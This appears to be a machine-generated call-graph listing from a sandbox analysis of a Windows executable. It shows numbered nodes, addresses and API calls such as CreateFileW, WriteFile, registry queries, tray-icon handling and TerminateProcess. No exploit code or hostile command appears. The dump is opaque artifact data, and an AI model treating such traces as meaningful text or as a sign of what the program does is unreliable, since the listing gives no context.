___lock_fhandle 59 API calls 98401->98406 98547 ca8d34 58 API calls __getptd_noexit 98402->98547 98403 cb0cb5 98551 ca8d68 58 API calls __getptd_noexit 98403->98551 98408 cb0cc0 98406->98408 98410 cb0cde 98408->98410 98411 cb0cd3 98408->98411 98409 cb0d19 98552 ca8ff6 9 API calls __wcsicmp_l 98409->98552 98548 ca8d68 58 API calls __getptd_noexit 98410->98548 98530 cb0d2d 98411->98530 98414 cb0c77 ___lock_fhandle 98414->98377 98416 cb0cd9 98549 cb0d05 LeaveCriticalSection __unlock_fhandle 98416->98549 98418->98367 98419->98371 98421 cadad2 ___lock_fhandle 98420->98421 98422 cadadf 98421->98422 98423 cadaf6 98421->98423 98521 ca8d34 58 API calls __getptd_noexit 98422->98521 98425 cadb95 98423->98425 98427 cadb0a 98423->98427 98527 ca8d34 58 API calls __getptd_noexit 98425->98527 98426 cadae4 98522 ca8d68 58 API calls __getptd_noexit 98426->98522 98430 cadb28 98427->98430 98431 cadb32 98427->98431 98523 ca8d34 58 API calls __getptd_noexit 98430->98523 98448 cad446 98431->98448 98432 cadb2d 98528 ca8d68 58 API calls __getptd_noexit 98432->98528 98435 cadb38 98437 cadb4b 98435->98437 98438 cadb5e 98435->98438 98457 cadbb5 98437->98457 98524 ca8d68 58 API calls __getptd_noexit 98438->98524 98439 cadba1 98529 ca8ff6 9 API calls __wcsicmp_l 98439->98529 98440 cadaeb ___lock_fhandle 98440->98387 98444 cadb57 98526 cadb8d LeaveCriticalSection __unlock_fhandle 98444->98526 98445 cadb63 98525 ca8d34 58 API calls __getptd_noexit 98445->98525 98449 cad452 ___lock_fhandle 98448->98449 98450 cad4a1 EnterCriticalSection 98449->98450 98451 ca9e4b __lock 58 API calls 98449->98451 98452 cad4c7 ___lock_fhandle 98450->98452 98453 cad477 98451->98453 98452->98435 98454 cad48f 98453->98454 98455 caa06b ___lock_fhandle InitializeCriticalSectionAndSpinCount 98453->98455 98456 cad4cb ___lock_fhandle LeaveCriticalSection 98454->98456 98455->98454 98456->98450 98458 cadbc2 __write_nolock 98457->98458 98459 cadbf6 98458->98459 98460 cadc20 98458->98460 98461 cadc01 98458->98461 98462 cac836 setSBUpLow 6 API calls 98459->98462 98464 cadc78 98460->98464 98465 cadc5c 98460->98465 98463 ca8d34 __write 58 API calls 98461->98463 98466 cae416 98462->98466 98467 cadc06 98463->98467 98469 cadc91 98464->98469 98473 cb1b11 __lseeki64_nolock 60 API calls 98464->98473 98468 ca8d34 __write 58 API calls 98465->98468 98466->98444 98470 ca8d68 __wcsicmp_l 58 API calls 98467->98470 98472 cadc61 98468->98472 98471 cb5ebb __stbuf 58 API calls 98469->98471 98474 cadc0d 98470->98474 98475 cadc9f 98471->98475 98476 ca8d68 __wcsicmp_l 58 API calls 98472->98476 98473->98469 98477 ca8ff6 __wcsicmp_l 9 API calls 98474->98477 98478 cadff8 98475->98478 98483 ca9bec __setmbcp 58 API calls 98475->98483 98479 cadc68 98476->98479 98477->98459 98480 cae38b WriteFile 98478->98480 98481 cae016 98478->98481 98482 ca8ff6 __wcsicmp_l 9 API calls 98479->98482 98484 cadfeb GetLastError 98480->98484 98490 cadfb8 98480->98490 98485 cae13a 98481->98485 98493 cae02c 98481->98493 98482->98459 98486 cadccb GetConsoleMode 98483->98486 98484->98490 98496 cae22f 98485->98496 98499 cae145 98485->98499 98486->98478 98488 cadd0a 98486->98488 98487 cae3c4 98487->98459 98489 ca8d68 __wcsicmp_l 58 API calls 98487->98489 98488->98478 98491 cadd1a GetConsoleCP 98488->98491 98494 cae3f2 98489->98494 98490->98459 98490->98487 98495 cae118 98490->98495 98491->98487 98497 cadd49 98491->98497 98492 cae09b WriteFile 98492->98484 98498 cae0d8 98492->98498 98493->98487 98493->98492 98500 ca8d34 __write 58 API calls 98494->98500 98501 cae3bb 98495->98501 98502 cae123 98495->98502 98496->98487 98503 cae2a4 WideCharToMultiByte 98496->98503 98497->98490 98513 ca3835 __write_nolock 58 API calls 98497->98513 98515 cb650a 60 API calls __write_nolock 98497->98515 98516 cade32 WideCharToMultiByte 98497->98516 98519 cade9f 98497->98519 98498->98493 98514 cae0fc 98498->98514 98499->98487 98504 cae1aa WriteFile 98499->98504 98500->98459 98507 ca8d47 __dosmaperr 58 API calls 98501->98507 98506 ca8d68 __wcsicmp_l 58 API calls 98502->98506 98503->98484 98508 cae2eb 98503->98508 98504->98484 98505 cae1f9 98504->98505 98505->98490 98505->98499 98505->98514 98509 cae128 98506->98509 98507->98459 98508->98490 98508->98496 98510 cae2f3 WriteFile 98508->98510 98508->98514 98512 ca8d34 __write 58 API calls 98509->98512 98510->98508 98511 cae346 GetLastError 98510->98511 98511->98508 98512->98459 98513->98497 98514->98490 98515->98497 98516->98490 98517 cade6d WriteFile 98516->98517 98517->98484 98517->98519 98518 cb7cae WriteConsoleW CreateFileW __putwch_nolock 98518->98519 98519->98484 98519->98490 98519->98497 98519->98518 98520 cadec7 WriteFile 98519->98520 98520->98484 98520->98519 98521->98426 98522->98440 98523->98432 98524->98445 98525->98444 98526->98440 98527->98432 98528->98439 98529->98440 98553 cad703 98530->98553 98532 cb0d91 98566 cad67d 59 API calls 2 library calls 98532->98566 98534 cb0d3b 98534->98532 98535 cb0d6f 98534->98535 98538 cad703 __close_nolock 58 API calls 98534->98538 98535->98532 98536 cad703 __close_nolock 58 API calls 98535->98536 98539 cb0d7b FindCloseChangeNotification 98536->98539 98537 cb0d99 98540 cb0dbb 98537->98540 98567 ca8d47 58 API calls 3 library calls 98537->98567 98541 cb0d66 98538->98541 98539->98532 98542 cb0d87 GetLastError 98539->98542 98540->98416 98544 cad703 __close_nolock 58 API calls 98541->98544 98542->98532 98544->98535 98545->98400 98546->98414 98547->98403 98548->98416 98549->98414 98550->98403 98551->98409 98552->98414 98554 cad70e 98553->98554 98555 cad723 98553->98555 98556 ca8d34 __write 58 API calls 98554->98556 98558 ca8d34 __write 58 API calls 98555->98558 98560 cad748 98555->98560 98557 cad713 98556->98557 98559 ca8d68 __wcsicmp_l 58 API calls 98557->98559 98561 cad752 98558->98561 98562 cad71b 98559->98562 98560->98534 98563 ca8d68 __wcsicmp_l 58 API calls 98561->98563 98562->98534 98564 cad75a 98563->98564 98565 ca8ff6 __wcsicmp_l 9 API calls 98564->98565 98565->98562 98566->98537 98567->98540 98569 ca09e2 __write_nolock 98568->98569 98570 ca09f1 GetLongPathNameW 98569->98570 98571 c87d2c 59 API calls 98570->98571 98572 c8741d 98571->98572 98573 c8716b 98572->98573 98574 c877c7 59 API calls 98573->98574 98575 c8717d 98574->98575 98576 c848ae 60 API calls 98575->98576 98577 c87188 98576->98577 98578 cbecae 98577->98578 98579 c87193 98577->98579 98584 cbecc8 98578->98584 98626 c87a68 61 API calls 98578->98626 98580 c83f84 59 API calls 98579->98580 98582 c8719f 98580->98582 98620 c834c2 98582->98620 98585 c871b2 Mailbox 98585->97499 98587 c84f3d 136 API calls 98586->98587 98588 c869ef 98587->98588 98589 cbe45a 98588->98589 98590 c84f3d 136 API calls 98588->98590 98591 ce97e5 122 API calls 98589->98591 98592 c86a03 98590->98592 98593 cbe46f 98591->98593 98592->98589 98594 c86a0b 98592->98594 98595 cbe473 98593->98595 98596 cbe490 98593->98596 98598 cbe47b 98594->98598 98599 c86a17 98594->98599 98600 c84faa 84 API calls 98595->98600 98597 ca0ff6 Mailbox 59 API calls 98596->98597 98619 cbe4d5 Mailbox 98597->98619 98734 ce4534 90 API calls _wprintf 98598->98734 98627 c86bec 98599->98627 98600->98598 98604 cbe489 98604->98596 98605 cbe689 98606 ca2f95 _free 58 API calls 98605->98606 98607 cbe691 98606->98607 98608 c84faa 84 API calls 98607->98608 98613 cbe69a 98608->98613 98612 ca2f95 _free 58 API calls 98612->98613 98613->98612 98614 c84faa 84 API calls 98613->98614 98738 cdfcb1 89 API calls 4 library calls 98613->98738 98614->98613 98616 c87f41 59 API calls 98616->98619 98619->98605 98619->98613 98619->98616 98720 c8766f 98619->98720 98728 c874bd 98619->98728 98735 cdfc4d 59 API calls 2 library calls 98619->98735 98736 cdfb6e 61 API calls 2 library calls 98619->98736 98737 ce7621 59 API calls Mailbox 98619->98737 98621 c834d4 98620->98621 98625 c834f3 _memmove 98620->98625 98623 ca0ff6 Mailbox 59 API calls 98621->98623 98622 ca0ff6 Mailbox 59 API calls 98624 c8350a 98622->98624 98623->98625 98624->98585 98625->98622 98626->98578 98628 cbe847 98627->98628 98629 c86c15 98627->98629 98830 cdfcb1 89 API calls 4 library calls 98628->98830 98744 c85906 60 API calls Mailbox 98629->98744 98632 cbe85a 98831 cdfcb1 89 API calls 4 library calls 98632->98831 98633 c86c37 98745 c85956 98633->98745 98637 c86c54 98638 c877c7 59 API calls 98637->98638 98640 c86c60 98638->98640 98639 cbe876 98642 c86cc1 98639->98642 98758 ca0b9b 60 API calls __write_nolock 98640->98758 98644 cbe889 98642->98644 98645 c86ccf 98642->98645 98643 c86c6c 98646 c877c7 59 API calls 98643->98646 98647 c85dcf CloseHandle 98644->98647 98648 c877c7 59 API calls 98645->98648 98649 c86c78 98646->98649 98650 cbe895 98647->98650 98651 c86cd8 98648->98651 98652 c848ae 60 API calls 98649->98652 98653 c84f3d 136 API calls 98650->98653 98654 c877c7 59 API calls 98651->98654 98656 c86c86 98652->98656 98657 cbe8b1 98653->98657 98655 c86ce1 98654->98655 98768 c846f9 98655->98768 98759 c859b0 ReadFile SetFilePointerEx 98656->98759 98660 cbe8da 98657->98660 98664 ce97e5 122 API calls 98657->98664 98832 cdfcb1 89 API calls 4 library calls 98660->98832 98663 c86cb2 98760 c85c4e 98663->98760 98665 cbe8cd 98664->98665 98669 cbe8f6 98665->98669 98670 cbe8d5 98665->98670 98667 cbe8f1 98690 c86e6c Mailbox 98667->98690 98673 c84faa 84 API calls 98669->98673 98672 c84faa 84 API calls 98670->98672 98672->98660 98674 cbe8fb 98673->98674 98675 ca0ff6 Mailbox 59 API calls 98674->98675 98682 cbe92f 98675->98682 98679 c83bcd 98679->97358 98679->97367 98683 c8766f 59 API calls 98682->98683 98684 cbe978 Mailbox 98683->98684 98686 cbeb69 98684->98686 98701 c8766f 59 API calls 98684->98701 98711 c87f41 59 API calls 98684->98711 98715 cbebbb 98684->98715 98833 cdfc4d 59 API calls 2 library calls 98684->98833 98834 cdfb6e 61 API calls 2 library calls 98684->98834 98835 ce7621 59 API calls Mailbox 98684->98835 98836 c87373 59 API calls Mailbox 98684->98836 98837 ce7581 59 API calls Mailbox 98686->98837 98739 c85934 98690->98739 98693 cbeb8b 98838 cef835 59 API calls 2 library calls 98693->98838 98696 cbeb98 98698 ca2f95 _free 58 API calls 98696->98698 98698->98690 98701->98684 98711->98684 98839 cdfcb1 89 API calls 4 library calls 98715->98839 98717 cbebd4 98718 ca2f95 _free 58 API calls 98717->98718 98719 cbebe7 98718->98719 98719->98690 98721 c8770f 98720->98721 98725 c87682 _memmove 98720->98725 98723 ca0ff6 Mailbox 59 API calls 98721->98723 98722 ca0ff6 Mailbox 59 API calls 98724 c87689 98722->98724 98723->98725 98726 ca0ff6 Mailbox 59 API calls 98724->98726 98727 c876b2 98724->98727 98725->98722 98726->98727 98727->98619 98729 c874d0 98728->98729 98732 c8757e 98728->98732 98730 ca0ff6 Mailbox 59 API calls 98729->98730 98733 c87502 98729->98733 98730->98733 98731 ca0ff6 59 API calls Mailbox 98731->98733 98732->98619 98733->98731 98733->98732 98734->98604 98735->98619 98736->98619 98737->98619 98738->98613 98740 c85dcf CloseHandle 98739->98740 98741 c8593c Mailbox 98740->98741 98742 c85dcf CloseHandle 98741->98742 98743 c8594b 98742->98743 98743->98679 98744->98633 98746 c85dcf CloseHandle 98745->98746 98747 c85962 98746->98747 98842 c85df9 98747->98842 98749 c859a4 98749->98632 98749->98637 98750 c85981 98750->98749 98850 c85770 98750->98850 98752 c85993 98867 c853db SetFilePointerEx SetFilePointerEx 98752->98867 98754 c8599a 98754->98749 98755 cbe030 98754->98755 98868 ce3696 SetFilePointerEx SetFilePointerEx WriteFile 98755->98868 98757 cbe060 98757->98749 98758->98643 98759->98663 98767 c85c68 98760->98767 98761 c85cef SetFilePointerEx 98874 c85dae SetFilePointerEx 98761->98874 98762 cbe151 98875 c85dae SetFilePointerEx 98762->98875 98765 c85cc3 98765->98642 98766 cbe16b 98767->98761 98767->98762 98767->98765 98769 c877c7 59 API calls 98768->98769 98770 c8470f 98769->98770 98771 c877c7 59 API calls 98770->98771 98772 c84717 98771->98772 98773 c877c7 59 API calls 98772->98773 98774 c8471f 98773->98774 98775 c877c7 59 API calls 98774->98775 98776 c84727 98775->98776 98777 cbd8fb 98776->98777 98778 c8475b 98776->98778 98779 c881a7 59 API calls 98777->98779 98780 c879ab 59 API calls 98778->98780 98781 cbd904 98779->98781 98782 c84769 98780->98782 98783 c87eec 59 API calls 98781->98783 98784 c87e8c 59 API calls 98782->98784 98786 c8479e 98783->98786 98785 c84773 98784->98785 98785->98786 98787 c879ab 59 API calls 98785->98787 98789 c847bd 98786->98789 98803 c847de 98786->98803 98807 cbd924 98786->98807 98790 c84794 98787->98790 98793 c87b52 59 API calls 98789->98793 98792 c87e8c 59 API calls 98790->98792 98791 cbd9f4 98795 c87d2c 59 API calls 98791->98795 98792->98786 98796 c847c7 98793->98796 98794 c847ef 98814 cbd9b1 98795->98814 98801 c879ab 59 API calls 98796->98801 98796->98803 98801->98803 98876 c879ab 98803->98876 98804 cbd9dd 98804->98791 98809 cbd9c8 98804->98809 98807->98791 98807->98804 98813 cbd95b 98807->98813 98808 c87b52 59 API calls 98808->98814 98812 c87d2c 59 API calls 98809->98812 98810 cbd9b9 98811 c87d2c 59 API calls 98810->98811 98811->98814 98812->98814 98813->98810 98817 cbd9a4 98813->98817 98814->98803 98814->98808 98889 c87a84 59 API calls 2 library calls 98814->98889 98818 c87d2c 59 API calls 98817->98818 98818->98814 98830->98632 98831->98639 98832->98667 98833->98684 98834->98684 98835->98684 98836->98684 98837->98693 98838->98696 98839->98717 98843 cbe181 98842->98843 98844 c85e12 CreateFileW 98842->98844 98845 c85e34 98843->98845 98846 cbe187 CreateFileW 98843->98846 98844->98845 98845->98750 98846->98845 98847 cbe1ad 98846->98847 98848 c85c4e 2 API calls 98847->98848 98849 cbe1b8 98848->98849 98849->98845 98851 c8578b 98850->98851 98852 cbdfce 98850->98852 98853 c85c4e 2 API calls 98851->98853 98866 c8581a 98851->98866 98852->98866 98869 c85e3f 98852->98869 98854 c857ad 98853->98854 98855 c8538e 59 API calls 98854->98855 98857 c857b7 98855->98857 98857->98852 98858 c857c4 98857->98858 98859 ca0ff6 Mailbox 59 API calls 98858->98859 98860 c857cf 98859->98860 98861 c8538e 59 API calls 98860->98861 98862 c857da 98861->98862 98863 c85d20 2 API calls 98862->98863 98864 c85807 98863->98864 98865 c85c4e 2 API calls 98864->98865 98865->98866 98866->98752 98867->98754 98868->98757 98870 c85c4e 2 API calls 98869->98870 98871 c85e60 98870->98871 98872 c85c4e 2 API calls 98871->98872 98873 c85e74 98872->98873 98873->98866 98874->98765 98875->98766 98877 c879ba 98876->98877 98878 c87a17 98876->98878 98877->98878 98880 c879c5 98877->98880 98879 c87e8c 59 API calls 98878->98879 98881 c879e8 _memmove 98879->98881 98882 c879e0 98880->98882 98883 cbef32 98880->98883 98881->98794 98885 c88189 59 API calls 98883->98885 98889->98814 98892 c86ef5 98891->98892 98897 c87009 98891->98897 98893 ca0ff6 Mailbox 59 API calls 98892->98893 98892->98897 98894 c86f1c 98893->98894 98897->97505 99512 cc0226 99518 c8ade2 Mailbox 99512->99518 99514 cc0c86 99671 cd66f4 99514->99671 99516 cc0c8f 99518->99514 99518->99516 99519 cc00e0 VariantClear 99518->99519 99520 c8b6c1 99518->99520 99522 cf474d 331 API calls 99518->99522 99528 cfe24b 99518->99528 99531 cfe237 99518->99531 99534 ced2e6 99518->99534 99581 c92123 99518->99581 99621 ced2e5 99518->99621 99668 c89df0 59 API calls Mailbox 99518->99668 99669 cd7405 59 API calls 99518->99669 99519->99518 99670 cea0b5 89 API calls 4 library calls 99520->99670 99522->99518 99674 cfcdf1 99528->99674 99530 cfe25b 99530->99518 99532 cfcdf1 129 API calls 99531->99532 99533 cfe247 99532->99533 99533->99518 99535 ced310 99534->99535 99536 ced305 99534->99536 99539 c877c7 59 API calls 99535->99539 99571 ced3ea Mailbox 99535->99571 99758 c89c9c 59 API calls 99536->99758 99538 ca0ff6 Mailbox 59 API calls 99540 ced433 99538->99540 99541 ced334 99539->99541 99542 ced43f 99540->99542 99761 c85906 60 API calls Mailbox 99540->99761 99543 c877c7 59 API calls 99541->99543 99545 c89997 84 API calls 99542->99545 99546 ced33d 99543->99546 99547 ced457 99545->99547 99548 c89997 84 API calls 99546->99548 99549 c85956 67 API calls 99547->99549 99550 ced349 99548->99550 99551 ced466 99549->99551 99552 c846f9 59 API calls 99550->99552 99553 ced49e 99551->99553 99554 ced46a GetLastError 99551->99554 99555 ced35e 99552->99555 99558 ced4c9 99553->99558 99559 ced500 99553->99559 99556 ced483 99554->99556 99557 c87c8e 59 API calls 99555->99557 99562 ced3f3 Mailbox 99556->99562 99762 c85a1a CloseHandle 99556->99762 99560 ced391 99557->99560 99561 ca0ff6 Mailbox 59 API calls 99558->99561 99564 ca0ff6 Mailbox 59 API calls 99559->99564 99563 ced3e3 99560->99563 99568 ce3e73 3 API calls 99560->99568 99565 ced4ce 99561->99565 99562->99518 99760 c89c9c 59 API calls 99563->99760 99569 ced505 99564->99569 99570 ced4df 99565->99570 99574 c877c7 59 API calls 99565->99574 99572 ced3a1 99568->99572 99569->99562 99573 c877c7 59 API calls 99569->99573 99763 cef835 59 API calls 2 library calls 99570->99763 99571->99538 99571->99562 99572->99563 99575 ced3a5 99572->99575 99573->99562 99574->99570 99577 c87f41 59 API calls 99575->99577 99578 ced3b2 99577->99578 99759 ce3c66 63 API calls Mailbox 99578->99759 99580 ced3bb Mailbox 99580->99563 99582 c89bf8 59 API calls 99581->99582 99583 c9213b 99582->99583 99585 ca0ff6 Mailbox 59 API calls 99583->99585 99587 cc69af 99583->99587 99586 c92154 99585->99586 99589 c92164 99586->99589 99779 c85906 60 API calls Mailbox 99586->99779 99588 c92189 99587->99588 99783 cef7df 59 API calls 99587->99783 99597 c92196 99588->99597 99784 c89c9c 59 API calls 99588->99784 99591 c89997 84 API calls 99589->99591 99593 c92172 99591->99593 99595 c85956 67 API calls 99593->99595 99594 cc69f7 99596 cc69ff 99594->99596 99594->99597 99598 c92181 99595->99598 99785 c89c9c 59 API calls 99596->99785 99599 c85e3f 2 API calls 99597->99599 99598->99587 99598->99588 99782 c85a1a CloseHandle 99598->99782 99602 c9219d 99599->99602 99603 cc6a11 99602->99603 99604 c921b7 99602->99604 99606 ca0ff6 Mailbox 59 API calls 99603->99606 99605 c877c7 59 API calls 99604->99605 99607 c921bf 99605->99607 99608 cc6a17 99606->99608 99764 c856d2 99607->99764 99610 cc6a2b 99608->99610 99786 c859b0 ReadFile SetFilePointerEx 99608->99786 99615 cc6a2f _memmove 99610->99615 99787 ce794e 59 API calls 2 library calls 99610->99787 99612 c921ce 99612->99615 99780 c89b9c 59 API calls Mailbox 99612->99780 99616 c921e2 Mailbox 99617 c9221c 99616->99617 99618 c85dcf CloseHandle 99616->99618 99617->99518 99619 c92210 99618->99619 99619->99617 99781 c85a1a CloseHandle 99619->99781 99622 ced310 99621->99622 99623 ced305 99621->99623 99626 c877c7 59 API calls 99622->99626 99664 ced3ea Mailbox 99622->99664 99791 c89c9c 59 API calls 99623->99791 99625 ca0ff6 Mailbox 59 API calls 99627 ced433 99625->99627 99628 ced334 99626->99628 99629 ced43f 99627->99629 99794 c85906 60 API calls Mailbox 99627->99794 99630 c877c7 59 API calls 99628->99630 99632 c89997 84 API calls 99629->99632 99633 ced33d 99630->99633 99634 ced457 99632->99634 99635 c89997 84 API calls 99633->99635 99636 c85956 67 API calls 99634->99636 99637 ced349 99635->99637 99638 ced466 99636->99638 99639 c846f9 59 API calls 99637->99639 99640 ced49e 99638->99640 99641 ced46a GetLastError 99638->99641 99642 ced35e 99639->99642 99645 ced4c9 99640->99645 99646 ced500 99640->99646 99643 ced483 99641->99643 99644 c87c8e 59 API calls 99642->99644 99666 ced3f3 Mailbox 99643->99666 99795 c85a1a CloseHandle 99643->99795 99647 ced391 99644->99647 99648 ca0ff6 Mailbox 59 API calls 99645->99648 99650 ca0ff6 Mailbox 59 API calls 99646->99650 99649 ced3e3 99647->99649 99654 ce3e73 3 API calls 99647->99654 99651 ced4ce 99648->99651 99793 c89c9c 59 API calls 99649->99793 99655 ced505 99650->99655 99656 ced4df 99651->99656 99659 c877c7 59 API calls 99651->99659 99657 ced3a1 99654->99657 99658 c877c7 59 API calls 99655->99658 99655->99666 99796 cef835 59 API calls 2 library calls 99656->99796 99657->99649 99660 ced3a5 99657->99660 99658->99666 99659->99656 99662 c87f41 59 API calls 99660->99662 99663 ced3b2 99662->99663 99792 ce3c66 63 API calls Mailbox 99663->99792 99664->99625 99664->99666 99666->99518 99667 ced3bb Mailbox 99667->99649 99668->99518 99669->99518 99670->99514 99797 cd6636 99671->99797 99673 cd6702 99673->99516 99675 c89997 84 API calls 99674->99675 99676 cfce2e 99675->99676 99679 cfce75 Mailbox 99676->99679 99710 cfdab9 99676->99710 99678 cfd242 99745 cfdbdc 92 API calls Mailbox 99678->99745 99679->99530 99682 cfcec6 Mailbox 99682->99679 99686 c89997 84 API calls 99682->99686 99696 cfd0cd 99682->99696 99738 cef835 59 API calls 2 library calls 99682->99738 99739 cfd2f3 61 API calls 2 library calls 99682->99739 99683 cfd251 99684 cfd0db 99683->99684 99685 cfd25d 99683->99685 99723 cfcc82 99684->99723 99685->99679 99686->99682 99691 cfd114 99692 cfd12e 99691->99692 99693 cfd147 99691->99693 99740 cea0b5 89 API calls 4 library calls 99692->99740 99694 c8942e 59 API calls 99693->99694 99697 cfd153 99694->99697 99696->99678 99696->99684 99699 c891b0 59 API calls 99697->99699 99698 cfd139 GetCurrentProcess TerminateProcess 99698->99693 99700 cfd169 99699->99700 99709 cfd190 99700->99709 99741 c88ea0 59 API calls Mailbox 99700->99741 99702 cfd2b8 99702->99679 99706 cfd2cc FreeLibrary 99702->99706 99703 cfd17f 99742 cfd95d 107 API calls _free 99703->99742 99706->99679 99709->99702 99743 c88ea0 59 API calls Mailbox 99709->99743 99744 c89e9c 60 API calls Mailbox 99709->99744 99746 cfd95d 107 API calls _free 99709->99746 99711 c87faf 59 API calls 99710->99711 99712 cfdad4 CharLowerBuffW 99711->99712 99747 cdf658 99712->99747 99716 c877c7 59 API calls 99717 cfdb0d 99716->99717 99718 c879ab 59 API calls 99717->99718 99719 cfdb24 99718->99719 99720 c87e8c 59 API calls 99719->99720 99721 cfdb30 Mailbox 99720->99721 99722 cfdb6c Mailbox 99721->99722 99754 cfd2f3 61 API calls 2 library calls 99721->99754 99722->99682 99724 cfcc9d 99723->99724 99728 cfccf2 99723->99728 99725 ca0ff6 Mailbox 59 API calls 99724->99725 99726 cfccbf 99725->99726 99727 ca0ff6 Mailbox 59 API calls 99726->99727 99726->99728 99727->99726 99729 cfdd64 99728->99729 99730 cfdf8d Mailbox 99729->99730 99737 cfdd87 _strcat _wcscpy __wsetenvp 99729->99737 99730->99691 99731 c89cf8 59 API calls 99731->99737 99732 c89d46 59 API calls 99732->99737 99733 c89c9c 59 API calls 99733->99737 99734 c89997 84 API calls 99734->99737 99735 ca594c 58 API calls _W_store_winword 99735->99737 99737->99730 99737->99731 99737->99732 99737->99733 99737->99734 99737->99735 99757 ce5b29 61 API calls 2 library calls 99737->99757 99738->99682 99739->99682 99740->99698 99741->99703 99742->99709 99743->99709 99744->99709 99745->99683 99746->99709 99748 cdf683 __wsetenvp 99747->99748 99749 cdf6c2 99748->99749 99750 cdf6b8 99748->99750 99753 cdf769 99748->99753 99749->99716 99749->99721 99750->99749 99755 c87a24 61 API calls 99750->99755 99753->99749 99756 c87a24 61 API calls 99753->99756 99754->99722 99755->99750 99756->99753 99757->99737 99758->99535 99759->99580 99760->99571 99761->99542 99762->99562 99763->99562 99765 c856dd 99764->99765 99766 c85702 99764->99766 99765->99766 99771 c856ec 99765->99771 99767 c87eec 59 API calls 99766->99767 99770 ce349a 99767->99770 99768 ce34c9 99768->99612 99770->99768 99788 ce3436 ReadFile SetFilePointerEx 99770->99788 99789 c87a84 59 API calls 2 library calls 99770->99789 99772 c85c18 59 API calls 99771->99772 99774 ce35ba 99772->99774 99775 c85632 61 API calls 99774->99775 99776 ce35c8 99775->99776 99778 ce35d8 Mailbox 99776->99778 99790 c8793a 61 API calls Mailbox 99776->99790 99778->99612 99779->99589 99780->99616 99781->99617 99782->99587 99783->99587 99784->99594 99785->99602 99786->99610 99787->99615 99788->99770 99789->99770 99790->99778 99791->99622 99792->99667 99793->99664 99794->99629 99795->99666 99796->99666 99798 cd665e 99797->99798 99799 cd6641 99797->99799 99798->99673 99799->99798 99801 cd6621 59 API calls Mailbox 99799->99801 99801->99799 99802 c83633 99803 c8366a 99802->99803 99804 c83688 99803->99804 99805 c836e7 99803->99805 99842 c836e5 99803->99842 99806 c8375d PostQuitMessage 99804->99806 99807 c83695 99804->99807 99809 c836ed 99805->99809 99810 cbd31c 99805->99810 99814 c836d8 99806->99814 99811 cbd38f 99807->99811 99812 c836a0 99807->99812 99808 c836ca DefWindowProcW 99808->99814 99815 c836f2 99809->99815 99816 c83715 SetTimer RegisterWindowMessageW 99809->99816 99858 c911d0 10 API calls Mailbox 99810->99858 99862 ce2a16 71 API calls _memset 99811->99862 99817 c836a8 99812->99817 99818 c83767 99812->99818 99822 c836f9 KillTimer 99815->99822 99823 cbd2bf 99815->99823 99816->99814 99819 c8373e CreatePopupMenu 99816->99819 99824 c836b3 99817->99824 99825 cbd374 99817->99825 99847 c84531 99818->99847 99819->99814 99821 cbd343 99859 c911f3 331 API calls Mailbox 99821->99859 99854 c844cb Shell_NotifyIconW _memset 99822->99854 99829 cbd2f8 MoveWindow 99823->99829 99830 cbd2c4 99823->99830 99833 c8374b 99824->99833 99834 c836be 99824->99834 99825->99808 99861 cd817e 59 API calls Mailbox 99825->99861 99826 cbd3a1 99826->99808 99826->99814 99829->99814 99835 cbd2c8 99830->99835 99836 cbd2e7 SetFocus 99830->99836 99832 c8370c 99855 c83114 DeleteObject DestroyWindow Mailbox 99832->99855 99856 c845df 81 API calls _memset 99833->99856 99834->99808 99860 c844cb Shell_NotifyIconW _memset 99834->99860 99835->99834 99840 cbd2d1 99835->99840 99836->99814 99857 c911d0 10 API calls Mailbox 99840->99857 99842->99808 99843 c8375b 99843->99814 99845 cbd368 99846 c843db 68 API calls 99845->99846 99846->99842 99848 c84548 _memset 99847->99848 99849 c845ca 99847->99849 99850 c8410d 61 API calls 99848->99850 99849->99814 99852 c8456f 99850->99852 99851 c845b3 KillTimer SetTimer 99851->99849 99852->99851 99853 cbd6c0 Shell_NotifyIconW 99852->99853 99853->99851 99854->99832 99855->99814 99856->99843 99857->99814 99858->99821 99859->99834 99860->99845 99861->99842 99862->99826 99863 c81055 99868 c82649 99863->99868 99866 ca2f80 __cinit 67 API calls 99867 c81064 99866->99867 99869 c877c7 59 API calls 99868->99869 99870 c826b7 99869->99870 99875 c83582 99870->99875 99873 c82754 99874 c8105a 99873->99874 99878 c83416 59 API calls 2 library calls 99873->99878 99874->99866 99879 c835b0 99875->99879 99878->99873 99880 c835bd 99879->99880 99881 c835a1 99879->99881 99880->99881 99882 c835c4 RegOpenKeyExW 99880->99882 99881->99873 99882->99881 99883 c835de RegQueryValueExW 99882->99883 99884 c835ff 99883->99884 99885 c83614 RegCloseKey 99883->99885 99884->99885 99885->99881 99886 cc0251 99898 c9fb84 99886->99898 99888 cc0267 99889 cc027d 99888->99889 99890 cc02e8 99888->99890 99907 c89fbd 60 API calls 99889->99907 99893 c8fe40 331 API calls 99890->99893 99892 cc02bc 99897 cc02dc Mailbox 99892->99897 99908 ce85d9 59 API calls Mailbox 99892->99908 99893->99897 99895 cc0ce1 Mailbox 99897->99895 99909 cea0b5 89 API calls 4 library calls 99897->99909 99899 c9fb90 99898->99899 99900 c9fba2 99898->99900 99910 c89e9c 60 API calls Mailbox 99899->99910 99901 c9fba8 99900->99901 99902 c9fbd1 99900->99902 99904 ca0ff6 Mailbox 59 API calls 99901->99904 99911 c89e9c 60 API calls Mailbox 99902->99911 99906 c9fb9a 99904->99906 99906->99888 99907->99892 99908->99897 99909->99895 99910->99906 99911->99906 99912 cbff06 99913 cbff10 99912->99913 99925 c8ac90 Mailbox _memmove 99912->99925 100013 c88e34 59 API calls Mailbox 99913->100013 99918 ca0ff6 59 API calls Mailbox 99928 c8a097 Mailbox 99918->99928 99920 c8b685 100018 cea0b5 89 API calls 4 library calls 99920->100018 99922 c8b5d5 99927 c881a7 59 API calls 99922->99927 99923 c8a1b7 99924 c8b5da 100023 cea0b5 89 API calls 4 library calls 99924->100023 99925->99920 99925->99923 99925->99928 99931 c87f41 59 API calls 99925->99931 99942 cfbf80 331 API calls 99925->99942 99944 cd66f4 Mailbox 59 API calls 99925->99944 99945 c8b416 99925->99945 99947 c8a000 331 API calls 99925->99947 99948 cc0c94 99925->99948 99950 cc0ca2 99925->99950 99953 c8b37c 99925->99953 99954 ca0ff6 59 API calls Mailbox 99925->99954 99961 c8ade2 Mailbox 99925->99961 99969 cfc5f4 99925->99969 100001 ce7be0 99925->100001 100014 cd7405 59 API calls 99925->100014 100015 cfc4a7 85 API calls 2 library calls 99925->100015 99927->99923 99928->99918 99928->99922 99928->99923 99928->99924 99929 cc047f 99928->99929 99932 c881a7 59 API calls 99928->99932 99935 c877c7 59 API calls 99928->99935 99936 ca2f80 67 API calls __cinit 